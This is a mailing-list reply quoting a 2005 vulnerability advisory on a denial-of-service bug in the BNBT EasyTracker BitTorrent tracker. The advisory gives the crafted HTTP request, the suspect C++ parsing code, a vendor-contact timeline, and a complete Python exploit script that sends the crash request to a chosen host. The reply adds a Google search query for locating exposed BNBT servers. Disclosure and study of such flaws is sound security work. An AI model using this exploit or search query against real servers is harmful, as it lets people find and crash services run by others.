To find out BNBT servers, Google:  intitle:"bnbt" inurl:":6969"

On 8/30/05, Sowhat . <[EMAIL PROTECTED]> wrote:
> BNBT EasyTracker Remote Denial of Service Vulnerability
> by Sowhat
> Last Update:2005.08.30
> Vendor:
> Product Affected:
> 7.7r3.2004.10.27 and below
> Overview:
> BNBT was written by Trevor Hogan. BNBT is a complete port 
> of the original Python BitTorrent tracker to C++ for speed
> and efficiency. BNBT also offers many additional features
> beyond the original Python BitTorrent tracker, plus it's 
> easy to use and customizable. BNBT is covered under the GNU
>  Lesser General Public License (LGPL).
> A Denial of Service vulnerability exists within BNBT which
> allows for an attacker to cause the BNBT to stop responding. 
> Details:
> A specifically crafted HTTP request will cause the BNBT 
> Server stop responding.
> Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
> will reproduce the problem. It seems that the bug is located
> in client.cpp, "//grab headers" section. And it is something
> like " 1-2 = -1" and similar to memcpy(-1) ? 
> // grab headers
>  string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
>  string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );
>  strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
> iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
>  while( 1 )
>  {
>   string :: size_type iSplit = strTemp.find( ":" );
>   string :: size_type iEnd = strTemp.find( "\r\n" );
>   if( iSplit == string :: npos )
>   {
>    UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n"
> );
>    break;
>   }
>   string strKey = strTemp.substr( 0, iSplit );
>   string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
> strlen( "\r\n" ) );//Bug here ??
>   rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
>   strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );
>   if( iEnd == string :: npos )
>    break;
>  }
> However, I am not quite sure about that and it seems that
> it is only a D.O.S so I havnt deep into it. 
> Exploit:
> //
> # BNBT EasyTracker Remote D.O.S Exploit
> # Bug discoverd and coded by Sowhat
> #
> # Version 7.7r3.2004.10.27 and below
> # the BNBT project: 
> import sys
> import string
> import socket
> if (len(sys.argv) != 2):
>  print "\nUsage: " + sys.argv[0] + " TargetIP\n"
>  print
> "##################################################################"
>  print "#                                                  
>              #" 
>  print "#          BNBT EasyTracker Remote D.O.S Exploit                 #"
>  print "#           Bug discoverd and coded by Sowhat                    #"
>  print "#                                 
>    #"
>  print
> "##################################################################"
>  sys.exit(0)
> host = sys.argv[1]
> port = 6969
> payload  = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
> s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> s.connect((host,port))
> s.send(payload)
> No WORKAROUND this time.
> plz check the vendor's website for update
> Maybe there will be a patch later (?)
> Vendor Response:
> 2005.08.22 Vendor notified via Webform,no email found 
> 2005.08.30 Vendor no response. Advisory Released
> "Life is like a bug, Do you know how to exploit it ?"
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